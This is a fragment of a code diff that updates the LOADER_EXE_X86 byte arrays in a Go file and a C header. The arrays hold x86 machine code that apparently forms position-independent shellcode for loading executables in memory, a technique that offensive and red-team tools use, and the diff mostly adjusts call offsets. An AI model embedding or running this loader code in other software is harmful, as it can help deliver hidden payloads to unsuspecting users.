0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x8b, 0x5c, 0x24,
0x10, 0x50, 0x53, 0x8b, 0x11, 0x51, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
0xf7, 0xd8, 0x1b, 0xf6, 0x8b, 0x43, 0x0c, 0x33, 0xd2, 0x46, 0x8b, 0xca,
0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28,
0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00,
0x00, 0x72, 0xed, 0x53, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0xc6,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x14, 0x02, 0x00, 0x00, 0xc3, 0x81,
0xec, 0x38, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x48,
0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76,
@ -445,13 +452,13 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x45, 0x83, 0xc1, 0x04, 0x83, 0xc6, 0x08, 0x89, 0x4c, 0x24,
0x18, 0x3b, 0xaf, 0x3c, 0x02, 0x00, 0x00, 0x72, 0xb3, 0x8b, 0x87, 0x20,
0x09, 0x00, 0x00, 0x6a, 0x02, 0x5d, 0x3b, 0xc5, 0x75, 0x17, 0x57, 0xe8,
0x0f, 0xf1, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0xbb, 0xf0, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0x01, 0x00,
0x00, 0x8b, 0xb7, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
0x0f, 0x84, 0x55, 0x01, 0x00, 0x00, 0x8d, 0xb7, 0x60, 0x0d, 0x00, 0x00,
0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbf, 0x70,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x73, 0xef, 0xff, 0xff,
0x05, 0x00, 0x00, 0x01, 0x74, 0x2e, 0x57, 0xe8, 0x1f, 0xef, 0xff, 0xff,
0x59, 0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x57, 0xf0, 0xff, 0xff, 0x59,
0x84, 0x26, 0x01, 0x00, 0x00, 0x57, 0xe8, 0x03, 0xf0, 0xff, 0xff, 0x59,
0x85, 0xc0, 0x75, 0x0c, 0x39, 0xaf, 0x70, 0x05, 0x00, 0x00, 0x0f, 0x84,
0x0f, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84, 0x9c, 0x00,
0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0x6a, 0x04, 0x05, 0x2f,
@ -471,9 +478,9 @@ var LOADER_EXE_X86 = []byte{
0x83, 0x3e, 0x01, 0x74, 0x17, 0x39, 0x2e, 0x74, 0x13, 0x83, 0x3e, 0x05,
0x74, 0x05, 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x57, 0xe8, 0x8f, 0x0c,
0x00, 0x00, 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8,
0xd4, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x80, 0xfa, 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d,
0x44, 0x24, 0x24, 0x50, 0x56, 0x57, 0xe8, 0xa0, 0x00, 0x00, 0x00, 0x83,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x7f, 0xf5, 0xff,
0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x57, 0xe8, 0x2b, 0xf5, 0xff,
0xff, 0xeb, 0x07, 0x56, 0x57, 0xe8, 0xe9, 0x03, 0x00, 0x00, 0x59, 0x59,
0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75, 0x02, 0xeb, 0xfe, 0x8b,
0x6c, 0x24, 0x10, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8, 0x02,
@ -633,7 +640,7 @@ var LOADER_EXE_X86 = []byte{
0x85, 0xc9, 0x74, 0x71, 0x8b, 0x6c, 0x24, 0x38, 0x8b, 0xb4, 0x24, 0x58,
0x03, 0x00, 0x00, 0x79, 0x0c, 0x51, 0x6a, 0x00, 0x55, 0x53, 0xe8, 0xa4,
0x09, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x7a, 0x02, 0x03, 0xf9, 0x83, 0x7e,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x93, 0xf2, 0xff, 0xff, 0x59,
0x04, 0x00, 0x74, 0x19, 0x57, 0x53, 0xe8, 0x3f, 0xf2, 0xff, 0xff, 0x59,
0x59, 0x85, 0xc0, 0x74, 0x0c, 0x8b, 0x83, 0x08, 0x01, 0x00, 0x00, 0x8b,
0x7c, 0x24, 0x20, 0xeb, 0x11, 0x6a, 0x00, 0x57, 0x55, 0x53, 0xe8, 0x74,
0x09, 0x00, 0x00, 0x8b, 0x7c, 0x24, 0x30, 0x83, 0xc4, 0x10, 0x89, 0x07,
@ -746,10 +753,10 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05, 0x00, 0x00,
0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff, 0x53, 0x50,
0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44, 0x24, 0x14,
0x50, 0x53, 0xe8, 0xa5, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0x48, 0xde,
0x50, 0x53, 0xe8, 0x51, 0xdf, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x4c, 0x89,
0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8, 0xf4, 0xdd,
0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0xdb, 0xe9, 0xff, 0xff,
0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x87, 0xe9, 0xff, 0xff,
0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xec, 0x00, 0x00, 0x00, 0x85,
0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x0c, 0x50,
0x8d, 0x83, 0xd0, 0x08, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56, 0x8d, 0x83,
@ -811,12 +818,12 @@ var LOADER_EXE_X86 = []byte{
0x24, 0x8b, 0xf0, 0x83, 0xc4, 0x10, 0x85, 0xf6, 0x0f, 0x84, 0x75, 0xff,
0xff, 0xff, 0x85, 0xed, 0x74, 0x33, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74,
0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0, 0x85, 0xf6, 0x0f,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x9a, 0xea, 0xff,
0x84, 0x5a, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8, 0x46, 0xea, 0xff,
0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0x44,
0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x20, 0xeb, 0x34, 0x83, 0x7c, 0x24,
0x10, 0x00, 0x74, 0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0,
0x85, 0xf6, 0x0f, 0x84, 0x27, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8,
0x67, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x13, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x0f, 0x84, 0x11, 0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x40,
0x04, 0x8b, 0x54, 0x24, 0x14, 0x89, 0x06, 0xe9, 0xff, 0xfe, 0xff, 0xff,
0x8b, 0x3f, 0x8d, 0x83, 0x70, 0x03, 0x00, 0x00, 0x83, 0x7f, 0x18, 0x00,
@ -863,14 +870,14 @@ var LOADER_EXE_X86 = []byte{
0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef,
0x8d, 0x44, 0x24, 0x60, 0xc6, 0x44, 0x14, 0x60, 0x00, 0x50, 0x8d, 0x44,
0x24, 0x24, 0x50, 0x57, 0xff, 0xb4, 0x24, 0xb0, 0x00, 0x00, 0x00, 0xe8,
0xd4, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x80, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x16, 0x8b, 0x84, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x2b, 0x43, 0x10, 0x8b,
0x34, 0x82, 0x03, 0xf7, 0xe9, 0x6e, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x5f,
0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x90, 0x00, 0x00, 0x00, 0xc3, 0x55, 0x8b,
0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40,
0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, 0xeb, 0x20, 0x85, 0xc9, 0x75,
0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, 0xff, 0x75, 0x10, 0xff, 0x75,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0xd5, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x81, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x75, 0xd9,
0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24,
0x24, 0x33, 0xc0, 0x55, 0x56, 0x33, 0xed, 0x89, 0x44, 0x24, 0x0c, 0x57,

271
loader_exe_x86.h
View File

@ -4,17 +4,17 @@ unsigned char LOADER_EXE_X86[] = {
0xe4, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x39, 0x9e, 0x38,
0x02, 0x00, 0x00, 0x0f, 0x84, 0xea, 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c,
0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c, 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x45, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x99, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84, 0xc0, 0x00, 0x00, 0x00, 0x53, 0x53,
0x56, 0xe8, 0x2d, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0xd7, 0x22, 0x40,
0x00, 0x2d, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0x56, 0xe8, 0x81, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0x2b, 0x23, 0x40,
0x00, 0x2d, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x0c,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x03,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x57,
0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x89, 0x44, 0x24, 0x28, 0xff, 0x76,
0x28, 0xff, 0xb6, 0xa4, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa0, 0x00, 0x00,
0x00, 0x56, 0xe8, 0xe7, 0x27, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0x00, 0x56, 0xe8, 0x3b, 0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa8,
0x00, 0x00, 0x00, 0x56, 0xe8, 0xcd, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x21, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x8b, 0xe8, 0x6a, 0x00, 0xff, 0x56, 0x38, 0x83, 0x7c, 0x24, 0x10, 0x00,
0x89, 0x44, 0x24, 0x14, 0x74, 0x4c, 0x85, 0xdb, 0x74, 0x48, 0x85, 0xed,
0x74, 0x44, 0x8d, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x18, 0x07, 0x00,
@ -22,18 +22,18 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x03, 0x44, 0x24, 0x14, 0x83, 0xa4, 0x24, 0xdc, 0x00, 0x00,
0x00, 0xfc, 0x89, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x6a, 0x00, 0x50, 0xff, 0x54, 0x24, 0x18, 0xeb, 0x0c, 0x83, 0xc8,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0xc6, 0x11, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0x1a, 0x12, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd4, 0x02, 0x00, 0x00, 0xc3, 0x8b,
0x44, 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2,
0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x23, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x10,
0xe8, 0x92, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x77, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x64,
0x25, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0xfd, 0x24, 0x00, 0x00, 0xb9, 0x2e,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0x51, 0x25, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c,
0xe8, 0xea, 0x24, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x10, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24,
0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d,
@ -53,29 +53,29 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0xc6, 0x14, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33,
0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b,
0x40, 0x2c, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xd9, 0x23,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x48, 0x24, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x2d, 0x24,
0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xc6, 0x23, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x1a, 0x24, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0xb3, 0x23, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xa0, 0x23, 0x00, 0x00, 0xb9,
0x07, 0x24, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0xb9,
0x21, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x8d, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x7a, 0x23, 0x00,
0x10, 0xe8, 0xe1, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0xce, 0x23, 0x00,
0x00, 0xb9, 0xb9, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0x67, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x54,
0x89, 0x41, 0x18, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xa8,
0x23, 0x00, 0x00, 0xb9, 0x6e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x41, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x95, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0x2e, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x82, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x28, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2,
0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a,
0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0x8b, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0xdf, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c,
0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d,
0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0,
@ -95,38 +95,38 @@ unsigned char LOADER_EXE_X86[] = {
0x08, 0xc3, 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51,
0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x54, 0x03, 0x00, 0x00,
0x50, 0x56, 0xe8, 0x0a, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0x50, 0x56, 0xe8, 0x5e, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0xdb, 0x75, 0x06, 0x40, 0xe9, 0xd5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x6a,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0x88,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0xdc,
0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x0f, 0x84,
0xb2, 0x00, 0x00, 0x00, 0xbf, 0x48, 0x14, 0x40, 0x00, 0x81, 0xef, 0x3c,
0x14, 0x40, 0x00, 0x0f, 0x88, 0xa1, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xa8, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x0c, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xfc, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x60, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
0x6a, 0x00, 0x8d, 0x86, 0xd8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8,
0x1b, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x6f, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x49, 0xbf, 0x5e, 0x14, 0x40, 0x00, 0xbb, 0x52, 0x14, 0x40, 0x00, 0x2b,
0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x46, 0x21, 0x00,
0x00, 0x81, 0xeb, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0xaf, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x9a, 0x21, 0x00,
0x00, 0x81, 0xeb, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0x03, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40,
0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x55, 0x8b,
0xec, 0x51, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x8d, 0x86, 0x68, 0x03, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x0d, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0x9b, 0x21, 0x00, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x61, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0xef, 0x21, 0x00, 0x00,
0x8b, 0xf8, 0x83, 0xc4, 0x18, 0x85, 0xff, 0x74, 0x34, 0x8d, 0x45, 0x08,
0x50, 0x6a, 0x40, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74,
0x24, 0x6a, 0x04, 0x8d, 0x86, 0x0d, 0x06, 0x00, 0x00, 0x50, 0x57, 0xe8,
0x43, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x97, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x75, 0x08, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x81, 0xec, 0xec, 0x02, 0x00,
0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xfc, 0x02, 0x00, 0x00, 0x8d,
0x44, 0x24, 0x34, 0x57, 0x6a, 0x3c, 0x33, 0xed, 0x33, 0xdb, 0x21, 0x5c,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x21, 0x27,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x75, 0x27,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc7, 0x44, 0x24, 0x38, 0x3c, 0x00, 0x00,
0x00, 0x8d, 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00,
